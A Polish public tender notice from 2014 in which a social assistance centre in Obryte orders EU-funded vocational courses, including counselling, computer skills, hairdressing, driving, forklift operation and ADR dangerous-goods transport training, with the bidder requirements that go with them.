Szczególną uwagę należy zwrócić na zachowania kierowcy wynikające z ochrony ładunku przewożonego w pojeździe oznakowanym tablicami ostrzegawczymi barwy pomarańczowej (dział 1.10 ADR). Należy odwołać się do wiadomości zdobytych na kursie podstawowym z tematu Ochrona towarów niebezpiecznych. Niezachowanie szczególnej ochrony przy przewozie materiałów klasy 1 może stanowić zagrożenie o nieobliczalnych skutkach dla ludzi i środowiska.
Szkolenie specjalistyczne ADR dla klasy 7  w wymiarze 8 godz.
Szczególne wymagania dotyczące pakowania, manipulowania, ładowania razem i układania materiałów promieniotwórczych
Specyficzne zagrożenia związane z promieniowaniem jonizującym
Szczególne środki bezpieczeństwa, które powinny być podjęte w razie wypadku z materiałem promieniotwórczym
 Szkolenie realizowane będzie  na  podstawie:
Ustawy z dnia 19 sierpnia 2011r. o przewozie towarów niebezpiecznych ( Dz. U. z 2011r. Nr. 227 poz. 1367  z późn. zm.)
oraz  Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej  z dnia 29 maja 2012r. w sprawie prowadzenia kursów z zakresu  przewozów towarów niebezpiecznych ( Dz. U z 2012r., poz. 619).
Szczególną uwagę należy zwrócić na zachowania kierowcy wynikające z ochrony ładunku przewożonego w pojeździe oznakowanym tablicami ostrzegawczymi barwy pomarańczowej ( dział 1.10 ADR). Należy odwołać się do zdobytych wiadomości na kursie podstawowym z tematu  Ochrona towarów niebezpiecznych . Niezachowanie szczególnej ochrony przy przewozie materiałów klasy 7 może stanowić zagrożenie o nieobliczalnych skutkach dla ludzi i środowiska.
Kurs kończy się egzaminem państwowym przeprowadzanym przez Urząd Marszałkowski.

Zaświadczenia lub certyfikaty

Uczestnik otrzymuje zaświadczenie o ukończeniu kursu ADR, oraz przystępuje do egzaminu  przeprowadzanego przez Urząd Marszałkowski.
UWAGA do wszystkich części zamówienia.
Zamawiający nie dysponuje salą do przeprowadzenia szkoleń.
Do ceny ofertowej należy wkalkulować koszt wykonania dla każdego uczestnika
BADAŃ  LEKARZA  MEDYCYNY  PRACY oraz innych badań niezbędnych do
przeprowadzenia kursu.
Wykonawca będzie prowadził bieżącą dokumentację kursu, tj. imienną listę
obecności, dziennik zajęć, imienną listę odbioru materiałów szkoleniowych, protokoły
z egzaminów, ankiety ewaluacyjne do każdego zadania (zał. Nr 7). Kurs powinien zakończyć się wydaniem zaświadczenia o ukończeniu (dotyczy kursów z wymiarem min. 30 godzin lekcyjnych),zaświadczenia opatrzone informacją o współfinansowaniu oraz logo UE, EFS, PO KL.
Wykonawca jest zobowiązany do przekazania Zamawiającemu kserokopii
zaświadczeń potwierdzonych za zgodność z oryginałem i listy potwierdzającej odbiór
w/w zaświadczeń lub certyfikatów. Wykonawca przekaże Zamawiającemu zdjęcia -
fotografie z przeprowadzonego kursu w ilości minimum 15 zdjęć na płycie CD/DVD. Wykonawca zrealizuje kurs w oparciu o program szkolenia spełniający zasady i warunki podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych, a także spełniający określone dla tych zawodów standardy kwalifikacji i szkolenia. Do realizacji kursu Wykonawca musi zapewnić uczestnikom wszelkie niezbędne i odpowiednie materiały szkoleniowe (np. prezentacje, sprzęt, pomoce dydaktyczne). Materiały szkoleniowe muszą być adekwatne do treści kursu i opatrzone informacją o współfinansowaniu, flagą UE oraz logo Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem Komunikacji POKL 2007-2013 oraz Wytycznymi dot. oznaczania projektów w ramach PO KL). Materiały powinny być przekazane każdemu uczestnikowi za  pokwitowaniem na początku szkolenia, bądź na bieżąco zgodnie z tematyką realizowanych zajęć. Ponadto 1 egzemplarz całości materiałów szkoleniowych Wykonawca zobowiązany jest przekazać Zamawiającemu.
Wykonawca ponosi wszelkie koszy związane z opłatą za egzaminy, wynajem  sali do szkoleń  oraz inne  koszty niezbędne do prawidłowego wykonania zamówienia .
Ww koszty  proszę wkalkulować w cenę oferowaną..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie  spełniony na podstawie złożonego  oświadczenia z art.22. (zał. Nr 2).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert  o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których  usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, tj., warunek ten uznaje się za spełniony jeżeli wykaz będzie zawierał co najmniej 1 usługę ( za kwotę 15 tyś. złotych) w zakresie prowadzenia szkoleń  o tematyce zawartej w przedmiocie zamówienia .
Wykaz może być przedstawiony jako poświadczenie, z tym że w odniesieniu do nadal wykonywanych  usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania  ofert; - załącznik Nr  4  do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie  spełniony na podstawie złożonego  oświadczenia , że osoby uczestniczące w wykonywaniu zamówień posiadają wymagane uprawnienia - zał. nr 5,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie  spełniony na podstawie złożonego  oświadczenia z art.22.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>KWESTIONARIUSZ ankiety ewaluacyjnej w ramach projektu realizowanego przez Ośrodek Pomocy Społecznej w Obrytem Razem i aktywnie w ramach Programu Operacyjnego Kapitał Ludzki</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Wszelkie zmiany, uzupełnienia i oświadczenia składane w związku z niniejszą Umową wymagają pisemnej zgody stron Umowy, pod rygorem ich nieważności. 
2.  Zmiany niniejszej umowy dozwolone są jedynie w granicach wskazanych treścią 
art. 144 ustawy prawo zamówień publicznych i wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.obryte.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Obrytem, Obryte 185, 07-215 Obryte.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2014 godzina 10:45, miejsce: Ośrodek Pomocy Społecznej, Obryte nr 185, 07-215 Obryte,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Razem i Aktywnie - Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Porady psychologiczne dla  11 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 80 godzin w tym: 21 godzin z doradztwa zawodowego ( dla 7 osób po 3 godz.) i 59 godzin zajęć warsztatów psychologicznych ( dla 11 osób po 5 godz, warsztatów indywidualnych oraz 4 godz. zajęć grupowych).

Budowanie poczucia własnej wartości: 
a) Czym jest poczucie własnej wartości. 
b) Wpływ samooceny na nasze życie. 
c) Sposoby na podniesienie poczucia własnej wartości. 
d) Wzmocnienie wiary we własne możliwości. 
Kształtowanie postawy asertywnej: 
a) Czym jest asertywność. 
b) Asertywne przyjmowanie ocen.
c) Przyjęcie aktywnej postawy w pokonywaniu życiowych trudności. 
Efektywna komunikacja: 
a) Charakterystyka procesu komunikacji. 
b) Techniki i metody efektywnej komunikacji w relacjach i kontaktach międzyludzkich. 
c) Komunikacja werbalna i niewerbalna. 
d) Diagnoza swojego stylu komunikacji. 
e) Sztuka słuchania i analizowania wypowiedzi. 
f) Komunikacja asertywna. 
Naukę radzenie sobie ze stresem: 
a) Mechanizm oddziaływania stresu na organizm. 
b) Uświadomienie uczestnikom indywidualnej podatności i odporności na stres. 
c) Odporność i radzenie sobie ze stresem. 
d) Sposoby optymalnego reagowania na bierność i agresję. 
Doradztwo zawodowe:
      a) udzielaniu niezbędnych informacji o zawodach, rynku pracy oraz      możliwościach kształcenia i szkolenia,
      b) udzielaniu pomocy w formie indywidualnych i grupowych porad zawodowych,
      c) określaniu predyspozycji zawodowych,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Obsługa kasy fiskalnej + obsługa komputera z elementami komputerowego wspierania firmy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 80 godzin w tym: 20 godzin zajęć teoretycznych i 60 godzin zajęć
praktycznych.
30 godzin kasy fiskalnej
50 godzin obsługi komputera
Kasa fiskalna
1. Znaczenie i funkcje kasy fiskalnej
2. Wygląd kasy i opis klawiatury
3. Uruchomienie kasy i wymiana papieru
4. Zasady sprzedaży
5.Sporzadzanie raportów, faktur, rachunku
6.Obsługa programu do fakturowania
7. Zajęcia praktyczne na kasach fiskalnych
Obsługa komputera
1. Obsługa oprzyrządowania komputerowego.
- budowa komputera, prawidłowe uruchamianie i wyłączanie
komputera,
- urządzenia peryferyjne,
- typy drukarek,
- zastosowanie skanera,
- porty we/wy, sposoby podłączenia urządzeń peryferyjnych.
2. System operacyjny Windows.
- funkcje systemu,
-  funkcje pulpitu Windows,
-  uruchamianie programów,
-  programy instalowane podczas systemu operacyjnego,
-  opis panelu sterowania,
- przeglądanie zasobów komputera.
3. Administrowanie danymi.
-  operacje na plikach i folderach,
- tworzenie oraz kasowanie, folderów, plików,
- kopiowanie, przenoszenie, wklejanie plików, folderów,
-  kosz systemowy.
4. Edytor tekstu (Microsoft Word).
-  zastosowanie i funkcje programu,
- elementy okna programu,
- wpisywanie i edycja tekstu,
-  wstawianie grafiki, tabel, symboli do dokumentu,
-  formatowanie dokumentu (czcionki, rozmiaru, koloru, akapitów,
tabulatorów),
- opcje oraz drukowanie dokumentów.
5. Arkusz kalkulacyjny excel
- zastosowanie oraz funkcje programu,
- poruszanie się po arkuszu,
-  wprowadzanie i zmiana danych,
-  wykonywanie obliczeń, tworzenie wykresów,
-  drukowanie arkusza.
6. Internet, poczta elektroniczna, komunikatory internetowe.
- umiejętność korzystania z przeglądarek internetowych IE,
Firefox, Opera),
- wyszukiwanie danych w globalnej sieci,
- poczta elektroniczna: m. in. Outlook, zakładanie oraz
korzystanie z konta e-mail (wysyłanie i odbieranie
korespondencji),
-  ogólna wiedza nt: komunikatorów internetowych (zakładanie
kont, komunikacja, itp.).
Programy użytkowe w firmie:
- zasady działania i pracy z programami użytkowymi firmy, 
- ćwiczenia na programach użytkowych wspomagających pracę firmy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Fryzjer z elementami wizażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 200 godz.  dla każdego uczestnika projektu 
(160 godzin kurs fryzjerstwa i 40 godz. kurs wizażu)
Kurs fryzjerstwa
Nowoczesne techniki strzyżenia  
a)	podstawowe linie fryzury: profile, symetrie , asymetrie,
b)	typy i style fryzur,
c)	geometryczne elementy stylizacji,
d)	podział głowy na sekcje
bezpieczeństwo i higiena pracy,
a)	organizacja pracy w salonie fryzjerskim,
b)	zasady bhp, dezynfekcja i sterylizacja,
anatomia,
a)	rodzaje włosów - właściwości,
b)	diagnoza stanu włosów i skóry głowy
c)	budowa wewnętrzna włosa, choroby.
technologie fryzjerskie i stylizacja,
a)	cięcie-na tempo
b)	punktowanie,
c)	strzyżenie niestopniowane
d)	separowanie, pikowanie, cieniowanie
e)	zdejmowanie objętości z końcówek ( sleading, efilage),
f)	strzyżenie męskie, strzyżenie maszynką elektryczną.
koki i fryzury ślubne, upięcia, warkocze i fantazyjne upięcia z włosów długich i krótkich.
techniki modelowania włosów (modelowanie, suszenie bez użycia szczotki),
a)	modelowanie tradycyjne, modelowanie na prosto,
b)	nawijanie włosów na wałki,
trwała ondulacja (rodzaje preparatów do trwałej ondulacji, techniki nawijania włosów, przeprowadzenie zabiegu ondulacji, ondulacja częściowa i ondulacja końcówek i odrostów)
farbowanie włosów/balejage 
a)	analiza kolorystyczna, kolory podstawowe, pochodne, dopełniające,
b)	 omówienie preparatów do koloryzacji 
c)	utlenianie, tonowanie, farbowanie, odbarwianie włosa,
d)	rozjaśnianie, przyciemnianie i neutralizacja włosów.
e)	Techniki nakładania farb i baleyage (metoda światłocienia, makijaż włosów, flash, refleksy, koloryzacja zmywalna).
Kurs  wizażu:
Omówienie stanowiska pracy wizażysty.
Przygotowanie stanowiska pracy.
Przybory i akcesoria wizażysty.
Zasady dezynfekcji, czyszczenia i konserwacji akcesoriów.
      b)   Produkty kosmetyczne do makijażu.
Kuferek wizażysty.
     c)  Przygotowanie skóry twarzy do makijażu.
     d)  Techniczne aspekty makijażu.
Rodzaje kształtu twarzy - korekta.
Kamuflowanie defektów skóry.
Konturowanie oka i korekta brwi.
Techniki trwałego makijażu.
      e)  Makijaż dzienny dostosowany do wykonywanego zawodu.
f) makijaż wieczorowy,
g)	makijaż do okularów,
h)	makijaż zgodny z wiekiem ( makijaż dla 20-latki, 30-latki, 40-latki, makijaż po 50 roku życia),
      i) makijaż korekcyjny, techniki kamuflażu
      j) Techniki doklejania ozdób do twarzy modela: sztuczne rzęsy, cyrkonie, brokaty.
Aktualne trendy w makijażu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prawo jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 65  godzin na jednego uczestnika projektu
Program szkolenia teoretycznego
- Budowa, obsługa i eksploatacja samochodu osobowego
- Ogólne zasady poruszania się samochodem po drodze:
zachowanie ostrożności i właściwej postawy w stosunku do innych uczestników ruchu drogowego
- Zasady zachowania bezpiecznych odległości między pojazdami
- Środki wpływające na percepcję i szybkość reakcji (alkohol,
narkotyki, leki), wpływ zmęczenia i stanu emocjonalnego na
zachowanie kierowcy
- Ocena warunków na drodze - warunki atmosferyczne,
widoczność, nawierzchnia, bezpieczna jazda samochodem w różnych warunkach
- Bezpieczne przewożenie pasażerów dorosłych i dzieci
- Znaki drogowe
- Ruszanie, włączanie się do ruchu, zatrzymanie, postój
- Manewry (wyprzedzanie, omijanie, wymijanie, zmiana pasa ruchu)
- Skrzyżowania, ronda, ruch kierowany
- Używanie świateł pojazdu
- Dokumentacja pojazdu, kontrola drogowa
- Udzielanie pierwszej pomocy
- Zasady postępowania w razie uczestniczenia w wypadku lub kolizji drogowej
- Błędy najczęściej popełniane przez kierowców
- Przygotowanie do egzaminu teoretycznego
- Egzamin wewnętrzny
Program szkolenia praktycznego
- Budowa i obsługa samochodu
- Przygotowanie do jazdy, ruszanie, zatrzymanie, zmiana biegów
- Zmiana kierunku jazdy, cofanie
- Obsługa świateł
- Plac manewrowy - ćwiczenie umiejętności manewrowania pojazdem
- Jazda w terenie (dostosowanie prędkości do warunków na drodze, hamowanie awaryjne, bieg 5 i 6)
- Jazda w ruchu ulicznym (pasy ruchu, skrzyżowania, ronda, obserwowanie i przewidywanie działań innych uczestników
ruchu)
- Manewry w ruchu ulicznym (wyprzedzanie, omijanie, wymijanie, parkowanie)
- Jazda sportowa (wychodzenie z poślizgu, ostre wchodzenie w zakręty)
- Jazda z nawigacją
- Stacja benzynowa (tankowanie benzyny, oleju napędowego, gazu)
- Stacja kontroli pojazdów
- Czynności kontrolne na drodze
- Awaria na drodze (diagnostyka, zmiana koła, uzupełnienie płynów eksploatacyjnych)
- Plac manewrowy - przygotowanie do egzaminu
- Trasy egzaminacyjne - przygotowanie do egzaminu
- Egzamin wewnętrzny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 1:  Operator wózków jezdniowych z obsługą i wymianą butli gazowych.
Zadanie 2 :Operator koparko-ładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1:Operator wózków jezdniowych z obsługą i wymianą butli gazowych.
Łączna liczba godzin szkolenia:67 godzin zajęć dla każdego uczestnika projektu (godzina kursu liczy 60 minut i obejmuje zajęcia dydaktyczne liczące 45 minut oraz przerwę liczącą 15 minut)4  osoby
typy stosowanych wózków jezdniowych,
budowa wózków jezdniowych,
czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy wózkami,
czynności kierowcy w czasie pracy wózkami,
wiadomości z zakresu ładunkoznawstwa,
wiadomości z zakresu BHP,
wiadomości o dozorze technicznym,
obsługa i wymiana butli gazowych w wózkach zasilanych gazem propan - butan,
praktyczna nauka jazdy wózkami widłowymi.
Zadanie 2 :Operator koparko-ładowarki  
2 osoby-Łączna liczba godzin szkolenia: 176 godz. dla jednego uczestnika szkolenia (godzina kursu liczy 60 minut i obejmuje zajęcia dydaktyczne liczące 45 minut oraz przerwę liczącą 15 minut)
Program szkolenia powinien obejmować następujące zagadnienia:
użytkowanie eksploatacyjne,
dokumentacja techniczna,
bezpieczeństwo i higiena pracy,
podstawy elektrotechniki,
silniki spalinowe,
elementy hydrauliki,
budowa koparko-ładowarki,
technologia robót,
zajęcia praktyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs ADR - podstawowy wszystkich klas, kurs specjalistyczny w zakresie przewozu  w cysternach,  kurs specjalistyczny w zakresie przewozu materiałów wybuchowych klasy 1, kurs specjalistyczny w zakresie przewozu materiałów promieniotwórczych klasy 7..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 osoba
Łączna liczba godzin szkolenia: 56 godzin zajęć (godzina kursu liczy 60 minut i obejmuje zajęcia dydaktyczne liczące 45 minut oraz przerwę liczącą 15 minut)
Kurs ADR podstawowy w zakresie przewozu towarów niebezpiecznych w wymiarze 24 godz.
Wymagania ogólne dotyczące przewozu towarów niebezpiecznych
Główne rodzaje zagrożeń
Informacje na temat ochrony środowiska i kontroli przewozu odpadów
Działania zapobiegawcze i środki bezpieczeństwa właściwe dla różnych rodzajów zagrożeń
Czynności, które należy podjąć po zaistnieniu wypadku, w szczególności w zakresie pierwszej pomocy, bezpieczeństwa ruchu drogowego, używania sprzętu ochronnego, w tym gaśniczego oraz środków ochrony indywidualnej
Oznakowania oraz umieszczania nalepek ostrzegawczych i tablic barwy pomarańczowej
Obowiązki kierowcy związane z przewozem towarów niebezpiecznych
Przeznaczenie i sposób działania wyposażenia technicznego pojazdów
Zakazy ładowania razem różnych towarów niebezpiecznych
Środki ostrożności, które powinny być podjęte podczas załadunku i rozładunku towarów niebezpiecznych
Informacje na temat odpowiedzialności cywilnej, administracyjnej i karnej
Informacje na temat realizacji transportu kombinowanego
Manipulowanie sztukami przesyłki oraz ich układanie
Ograniczenia przejazdu przez tunele oraz postępowanie kierowcy podczas takiego przejazdu, w szczególności zapobieganie wypadkom, bezpieczeństwo, postępowanie w przypadku pożaru lub innych zagrożeń
Ochrona towarów niebezpiecznych
Uwaga!
Zgodnie z § 8 ust. 4 rozporządzenia MTBiGM z dn. 29.05.2012 r. w sprawie prowadzenia kursów z zakresu przewozu towarów niebezpiecznych  w celu przeprowadzenia ćwiczeń praktycznych minimalny czas trwania kursu przedłuża się o dodatkową godzinę lekcyjną na każde pięć osób uczestniczących w kursie.
Kurs ADR w zakresie przewozu towarów niebezpiecznych w cysternach 16 godz.: 
zachowanie się pojazdów na drodze, z uwzględnieniem przemieszczania się ładunku, 
szczególne wymagania dotyczące pojazdów, 
ogólne wiadomości na temat systemów napełniania i opróżniania cystern, 
przepisy szczególne dotyczące używania pojazdów, 
świadectwo dopuszczenia pojazdów do przewozu niektórych towarów niebezpiecznych, 
zasady umieszczania nalepek ostrzegawczych na cysternach, 
zasady znakowania cystern tablicami pomarańczowymi.
Uwaga!
Zgodnie z § 8 ust. 4 rozporządzenia MTBiGM z dn. 29.05.2012 r. w sprawie prowadzenia kursów z zakresu przewozu towarów niebezpiecznych  w celu przeprowadzenia ćwiczeń praktycznych minimalny czas trwania kursu przedłuża się o dodatkową godzinę lekcyjną na każde pięć osób uczestniczących w kursie.
Szkolenie specjalistyczne  ADR dla klasy 1 w wymiarze 8 godz.
Specyficzne zagrożenia stwarzane przez materiały i przedmioty wybuchowe, w tym wyroby pirotechniczne
Szczególne wymagania, w tym zakazy pakowania i ładowania razem różnych materiałów i przedmiotów klasy 1
